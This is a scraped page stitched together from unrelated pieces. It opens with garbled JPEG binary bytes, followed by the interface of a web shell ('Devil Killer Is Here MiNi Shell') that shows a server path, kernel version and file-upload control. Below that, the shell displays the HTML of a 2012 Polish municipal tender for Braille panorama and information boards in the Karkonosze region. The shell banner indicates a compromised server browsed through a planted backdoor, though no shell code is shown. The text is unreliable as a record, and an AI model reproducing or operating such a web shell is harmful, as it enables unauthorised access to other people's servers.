JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120917/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120917/199487-N-2012.html

<p class="kh_header"><b>Świeradów-Zdrój: Opracowanie dokumentacji projektowej niezbędnej do wyłonienia wykonawcy tablic i modeli dla osób z upośledzoną funkcją wzroku wraz z pełnieniem nadzoru autorskiego dla projektu partnerskiego pn.: ZOBACZYĆ KRAJOBRAZ - DOTKNĄĆ PRZESZŁOŚĆ - wykorzystanie potencjału kultury i dziedzictwa przeszłości na terenie Subregionu Karkonosze i Góry Izerskie</b><br>
<b>Numer ogłoszenia: 199487 - 2012; data zamieszczenia: 17.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Świeradów-Zdrój , ul. 11-go Listopada 35, 59-850 Świeradów-Zdrój, woj. dolnośląskie, tel. 075 7816471, faks 075 7816585.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.swieradowzdroj.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowej niezbędnej do wyłonienia wykonawcy tablic i modeli dla osób z upośledzoną funkcją wzroku wraz z pełnieniem nadzoru autorskiego dla projektu partnerskiego pn.: ZOBACZYĆ KRAJOBRAZ - DOTKNĄĆ PRZESZŁOŚĆ - wykorzystanie potencjału kultury i dziedzictwa przeszłości na terenie Subregionu Karkonosze i Góry Izerskie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opracowanie dokumentacji projektowej niezbędnej do wyłonienia wykonawcy tablic i modeli dla osób z upośledzoną funkcją wzroku wraz z pełnieniem nadzoru autorskiego dla projektu partnerskiego pn.: ZOBACZYĆ KRAJOBRAZ - DOTKNĄĆ PRZESZŁOŚĆ - wykorzystanie potencjału kultury i dziedzictwa przeszłości na terenie Subregionu Karkonosze i Góry Izerskie 

1. Cel zamówienia.
Gmina Miejska Świeradów-Zdrój razem z czterema Gminami: Miasto Jelenia Góra, Gmina Mirsk, Gmina Miejska Kowary oraz Gmina Janowice Wielkie realizuje projekt pn.: ZOBACZYĆ KRAJOBRAZ - DOTKNĄĆ PRZESZŁOŚĆ - wykorzystanie potencjału kultury i dziedzictwa przeszłości na terenie Subregionu Karkonosze i Góry Izerskie.
Projekt jest dofinansowany ze środków Unii Europejskiej w ramach Priorytetu nr 6 Wykorzystanie i promocja potencjału turystycznego i kulturowego Dolnego Śląska Turystyka i Kultura, Działania 6.4 Turystyka kulturowa Regionalnego Programu Operacyjnego dla Województwa Dolnośląskiego na lata 2007-2013.
W ramach Projektu przewidziane jest wykonanie i montaż tablic PANORAM i tablic INFORMACYJNYCH oraz opisów miejsc i obiektów, przystosowanych dla osób niepełnosprawnych z ograniczoną funkcją wzroku.
Zasadniczą i najbardziej wyróżniającą cechą zaproponowanej specyfikacji infrastruktury jest wykonanie takich narzędzi informacyjnych, które będą mogły być czytane przez osoby niepełnosprawne z ograniczoną funkcją wzroku. Owe dostosowanie będzie dotyczyło Tablic PANORAM i tablic INFORMACYJNYCH, oraz opisów miejsc i obiektów. Dostosowanie będzie polegało na tym, że umieszczone na nich informacje będą powtórzone alfabetem Braille`a, co pozwoli na zapoznanie się z nimi za pomocą dotyku. W przypadku Tablic Panoramicznych, które będą musiały stać w pewnym oddaleniu od widza, zostaną sporządzone panele, które zostaną ustawione w zasięgu osób chcących z nich skorzystać. Tablice informacyjne usytuowane w punktach widokowych będą obrazowały kształt linii horyzontu widocznego z tego punktu wraz z odpowiednimi opisami.
W ramach Projektu ZOBACZYĆ KRAJOBRAZ - DOTKNĄĆ PRZESZŁOŚĆ - wykorzystanie potencjału kultury i dziedzictwa przeszłości na terenie Subregionu Karkonosze i Góry Izerskie, partnerzy wykonują następujący zakres robót:
1. Lider Projektu - Gmina Miejska Świeradów-Zdrój
Roboty budowlane związane z rewitalizacją młyna wodnego w celu udostępnienia dla ruchu turystycznego : remont, rozbiórka, przebudowa i zmiana sposobu użytkowania zespołu budynków na nieruchomości młyna wodnego w Świeradowie-Zdroju, wraz z budową nowych elementów infrastruktury technicznej i obiektów małej architektury. 
2. Partner Projektu - Miasto Jelenia Góra  
Prace adaptacyjno-konserwatorskie wieży zamkowej w Jeleniej Górze zlokalizowanej przy ulicy Jasnej: przebudowa i adaptacja tarasu widokowego dla ruchu turystycznego, dobudowa do istniejącej struktury murów wieży, drewnianej galerii komunikacyjnej -schodów-. 
3. Partner Projektu - Gmina Mirsk  
Roboty budowlane związane z przebudową wieży ciśnień na wieżę widokową w Mirsku.
4. Partner Projektu - Gmina Miejska Kowary  
Prace konserwatorskie Sali Rajców znajdującej się w Ratuszu Miejskim w Kowarach, których celem było przywrócenie polichromiom ściennym i innym elementom wyposażenia Sali Rajców ich pierwotnych walorów technicznych i estetycznych.



5. Gmina Janowice Wielkie
Prace budowlane  mające na celu przystosowanie istniejącej wieży średniowiecznej dla potrzeb turystyki jako wieża widokowa. Dobudowano obiekt przeznaczony na informację turystyczną mającą obsługiwać wieżę widokową.
2. Przedmiot zamówienia.
2.1. Przedmiotem zamówienia jest :
 wykonanie dokumentacji projektowej służącej do opisu przedmiotu zamówienia na wykonanie robót budowlanych, dla których nie jest wymagane uzyskanie pozwolenia na budowę, a wymagane jest zgłoszenie robót :
koncepcja architektoniczna tablic;
plany, rysunki lub inne dokumenty umożliwiające jednoznaczne określenie rodzaju i zakresu robót budowlanych podstawowych oraz uwarunkowań i dokładnej lokalizacji ich wykonania - po 4 kpl. odrębnie dla każdego Partnera;
przedmiar robót - po 2 kpl. odrębnie dla każdego Partnera ;
kosztorys inwestorski - po 2 kpl. odrębnie dla każdego Partnera;
projekty, pozwolenia, uzgodnienia i opinie wymagane odrębnymi przepisami - uzgodnienie z Dolnośląskim Wojewódzkim Konserwatorem Zabytków  we Wrocławiu Delegatura w Jeleniej Górze, 58-500 Jelenia Góra, ul. 1-go Maja 23;
specyfikacja techniczna wykonania i odbioru robót budowlanych - 2 kpl.
Powyższą dokumentację należy przekazać Zamawiającemu również w formie elektronicznej na nośniku CD w następujących formatach: 
- teksty w formacie programu Adobe Acrobat (.pdf),
- mapy, rysunki w formacie JPG lub .pdf w rozdzielczości 150 DPI. 
b pełnienie nadzoru autorskiego. 

2.2. Wymagania dotyczące zaprojektowania tablic panoramicznych i tablic informacyjnych oraz lokalizacja tablic.
2.2.1. Tablice panoramiczne 
a tablica złożona z dwóch elementów:
1. tablica: kolorowe zdjęcia obiektów realizowanych w ramach projektu partnerskiego + informacja o historii obiektów -dane techniczne, historia- + informacja o projekcie partnerskim, około 200 słów w 4 językach -polski, angielski, niemiecki, czeski-, tablica o wymiarach 180cmx120cm,
2. panel ustawiony w zasięgu osób z upośledzoną funkcją wzroku z wyrytym konturem -zarysem- obiektów i skróconym opisem w alfabecie Braillea,
b tablica panoramiczna winna być z trwałego tworzywa, trwale zabezpieczona przed wandalizmem.
c tablica panoramiczna wolnostojąca na zewnątrz obiektów winna być zabezpieczona przed wpływem zmiennych warunków atmosferycznych.

1. Gmina Miejska  Świeradów-Zdrój
Tablica na  konstrukcji wsporczej, zakotwionej w ścianie lub posadzce w budynku młyna wodnego, ul. Lwówecka 5, Świeradów-Zdrój.
2. Miasto Jelenia Góra
Tablica  na konstrukcji wsporczej, zakotwionej w ścianie w budynku wieży widokowej, ul. Jasna, Jelenia Góra.
3. Gmina Mirsk 
Tablica wolnostojąca posadowiona na  nieruchomości wieży widokowej, ul. Wodna, Mirsk.
4. Gmina Miejska Kowary
Tablica na konstrukcji wsporczej, zakotwionej w ścianie lub w posadzce, w  budynku
Ratusza przy ul.1-go Maja 1a ,w Kowarach.
5. Gmina Janowice Wielkie
Tablica  wolnostojąca posadowiona na  nieruchomości cmentarza w Radomierzu,
Gmina Janowice Wielkie.



2.2.2. Tablice informacyjne  
1 tablice z trwałego tworzywa, trwale zabezpieczona przed wandalizmem, odporne na działanie zmiennych warunków atmosferycznych (tablice zewnętrzne),
2 informacje na tablicach w 4 językach (polski, angielski, niemiecki, czeski),
3 skrócony opis w alfabecie Braillea

1. Gmina Miejska Świeradów-Zdrój - tablica zamontowana na  wysokości umożliwiającej
sprawdzenie dotykiem z wózka inwalidzkiego, w budynku młyna wodnego, ul. Lwówecka 5
Świeradów-Zdrój. Tablica opisująca  sposób działania koła młyńskiego. Tablica o wymiarach 100cmx60cm.

2. Miasto Jelenia Góra - tablice - 3 szt., kotwione w murze tarasu widokowego, na tarasie widokowym budynku wieży widokowej, ul. Jasna Jelenia Góra. Na tablicach  zdjęcie panoramiczne widoku z objaśnieniami (2-3 wyrazowymi) głównych dominant - z wyrytą -linią horyzontu- i objaśnieniami w alfabecie Braillea. Tablica o wymiarach 120cmx20cm.

3. Gmina Mirsk - tablice 2 szt., montowane do ścian wewnętrznych wieży -na pomoście widokowym wieży widokowej- ul. Wodna, Mirsk. Na tablicach  zdjęcie panoramiczne widoku z objaśnieniami -2-3 wyrazowymi- głównych dominant - z wyrytą -linią horyzontu- i objaśnieniami w alfabecie Braillea. Tablica o wymiarach 100cmx60cm.

4. Gmina Miejska Kowary - tablica wolnostojąca , dotycząca ratusza miejskiego, z zarysem kształtu budowli, umieszczona w  budynku Ratusza przy ul.1-go Maja 1a w Kowarach na postumencie. Tablica o wymiarach 100cmx60cm.

5. Gmina Janowice Wielkie - tablica montowana do stalowej konstrukcji balustrady platformy widokowej wieży na cmentarzu w Radomierzu, Gmina Janowice Wielkie.
Na tablicy zdjęcie  panoramiczne widoku z objaśnieniami -2-3 wyrazowymi- głównych dominant - z wyrytą -linią horyzontu- i objaśnieniami w alfabecie Braillea. Tablica o wymiarach 180cmx22cm.

2.2.3. Zamawiający dopuszcza odstępstwa w wymiarach tablic panoramicznych i informacyjnych do 30 procent.

2.3. Przedmiot zamówienia w podziale na Partnerów:
2.3.1. Gmina Miejska Świeradów-Zdrój
a tablica panoramiczna - 1 szt. 
b tablica informacyjna - 1 szt.
2.3.2. Miasto Jelenia Góra
a tablica panoramiczna - 1 szt. 
b tablica informacyjna - 3 szt.
2.3.3. Gmina Mirsk
a tablica panoramiczna - 1 szt. 
b tablica informacyjna - 2 szt.
2.3.4. Gmina Miejska Kowary
a tablica panoramiczna - 1 szt. 
b tablica informacyjna - 1 szt. 
2.3.5. Gmina Janowice Wielkie 
a tablica panoramiczna - 1 szt. 
b tablica informacyjna  - 1 szt.
2.4. Termin wykonania zamówienia - 90 dni  od dnia zawarcia umowy.




2.5. Tablice panoramy i tablice informacyjne powinny być wyposażone w plakietki informacyjne o współfinansowaniu Projektu ze środków Unii Europejskiej w postaci: Projekt współfinansowany przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego dla Województwa Dolnośląskiego na lata 2007-2013.
2.6. Wykonawca ma obowiązek uzyskania akceptacji koncepcji i wykonanych projektów przez Zamawiającego.
2.7. Po stronie wykonawcy leży tłumaczenie dostarczonych informacji w języku polskim - na język niemiecki, angielski, czeski  oraz w skróconej wersji na język Braillea.
2.8. Dokumentacja projektowa, kosztorys inwestorski oraz przedmiar robót powinien być opracowany odrębnie dla każdego Partnera Projektu.
2.9. Do obowiązków Wykonawcy należy także pełnienie nadzoru autorskiego zgodnie z przepisami Prawa budowlanego (min. 2 wizyty na placu budowy: 1 wizyta w trakcie realizacji, 2 wizyta przy odbiorze robót).
Wykonawca zobowiązany jest do:
a czuwania w toku realizacji robót budowlanych nad zgodnością rozwiązań technicznych, materiałowych i użytkowych z dokumentacją projektową;
b) uzupełniania szczegółów dokumentacji projektowej oraz wyjaśniania Wykonawcy robót budowlanych wątpliwości powstałych w toku realizacji tych robót;
c udziału w odbiorze poszczególnych części robót budowlanych.
2.10. Zamawiający udzieli Wykonawcy pełnomocnictwa dotyczącego występowania w imieniu Zamawiającego do urzędów i instytucji administracji państwowej i samorządowej oraz osób trzecich w ramach wykonywania czynności niezbędnych do opracowania dokumentacji projektowej.  
2.11. Wykonawca podczas realizacji umowy zobowiązany jest do takiego działania na rzecz i w imieniu Zamawiającego, aby najkorzystniej zrealizować zamówienie tj. przy utrzymaniu standardów jakości działać na rzecz terminowego zakończenia realizacji zamówienia.
2.12. Prawa i obowiązki wynikające z niniejszego przedmiotu zamówienia, nie wykluczają obowiązku wykonywania w ramach zakresu umowy wszystkich innych czynności i zadań, które będą konieczne do prawidłowej realizacji umowy oraz zabezpieczenia interesów Zamawiającego zgodnie z obowiązującymi przepisami prawa oraz wytycznymi RPO WD. Czynności i zadania, o których mowa w zdaniu poprzedzającym realizowane będą z własnej inicjatywy Wykonawcy lub na zlecenie Zamawiającego w ramach ustalonego wynagrodzenia ryczałtowego.
2.13 W przypadku niejasności w zakresie praw i obowiązków Wykonawcy ustala się, iż celem niniejszej umowy jest  osiągnięcie celu projektu zgodnie z obowiązującymi przepisami prawa oraz wytycznymi RPO WD.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych o wartości do 10% zamówienia podstawowego, polegających na powtórzeniu zamówienia tego samego rodzaju</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.22.10.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 90.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium w następującej wysokości: 300,00 zł (słownie złotych: trzysta 00/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności. W celu potwierdzenia, że Wykonawca spełnia warunek nr 1 należy przedłożyć Oświadczenie o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Prawo Zamówień Publicznych Wykonawca spełnia warunek nr 1 jeżeli przedłoży oświadczenie o którym mowa w kol. III zgodne ze wzorem stanowiącym załącznik nr 2 do SIWZ;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dysponuje osobą posiadającą  następujące kwalifikacje i uprawnienia: uprawnienia budowlane do projektowania w specjalności architektownicznej bez ograniczeń .Wykonawca spełni warunek jeżeli przedłoży wykaz zgodne ze wzorem stanowiącym załącznik do SIWZ wraz z oświadczeniem o prawie dysponowania osobą/ami i wraz z dokumentem potwierdzającym posiadanie tytułu prawnego do dysponowania osobą/ami, który może być przedłożony zgodnie ze wzorem stanowiącym załącznik do SIWZ i przedłoży oświadczenie, że osoby ,które będą uczestniczyć w wykonywaniu zamówienia posiadają wymagane ustawowo uprawnienia/kwalifikacje</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. dokument określający zasady reprezentacji oraz osoby uprawnione do reprezentacji wykonawcy, a jeżeli
wykonawcę reprezentuje pełnomocnik - także pełnomocnictwo, określajace zakres umocowania podpisane przez
osoby uprawnione do reprezentowania wykonawcy
INFORMACJA UZUPEŁNIAJACA: Jeżeli w kraju zamieszkania osoby lub w kraju, w którym wykonawca ma
siedzibe lub miejsce zamieszkania, nie wydaje sie dokumentów, o których mowa w pkt. III.4.3.1, zastępuje sie je
dokumentem zawierajacym oświadczenie złożone przed notariuszem, właściwym organem sądowym,
administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania
osoby lub kraju, w którym wykonawca ma siedzibe lub miejsce zamieszkania - wystawione z odpowiednia data
wymagana dla tych dokumentów.
W przypadku oferty składanej przez wykonawców ubiegających się wspólnie o udzielenie zamówienia publicznego,
oświadczenie o spełnianiu każdego z warunków, o których mowa w art. 22 ust. 1 składa co najmniej jeden z tych
wykonawców w imieniu swoim i pozostałych wykonawców.
W przypadku oferty składanej przez wykonawców ubiegających się wspólnie o udzielenie zamówienia publicznego,
dokumenty potwierdzające, że wykonawca nie podlega wykluczeniu składa każdy z wykonawców oddzielnie.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Strony mogą zmienić postanowienia zawarte w niniejszej umowie, jeżeli: a) pomimo wystąpienia przez Wykonawcę z właściwie przygotowanym wnioskiem o wydanie decyzji administracyjnych lub warunków technicznych lub innego dokumentu niezbędnego do prawidłowej realizacji przedmiotu umowy, w terminie przewidzianym w odrębnych przepisach, organ administracji publicznej lub inna instytucja nie wyda stosownego dokumentu. W takim przypadku termin wykonania przedmiotu zamówienia zostanie przesunięty o ilość dni zwłoki w wydaniu stosownego dokumentu; b) Zamawiający z ważnych przyczyn, nie dających się przewidzieć w chwili zawarcia umowy, wstrzyma wykonywanie prac projektowych. W takim przypadku termin wykonania przedmiotu zamówienia zostanie przesunięty o ilość dni równą okresowi wstrzymania prac; c) zaistnieją przyczyny niezależne od działania Stron umowy, których przy zachowaniu wszelkich należnych środków nie można uniknąć ani im zapobiec, w szczególności protesty mieszkańców lub innych osób prawnych lub fizycznych. W takiej sytuacji termin wykonania przedmiotu umowy zostanie przesunięty o uzasadnioną okolicznościami ilość dni ustaloną przez Strony umowy; d) zaistnieją przyczyny 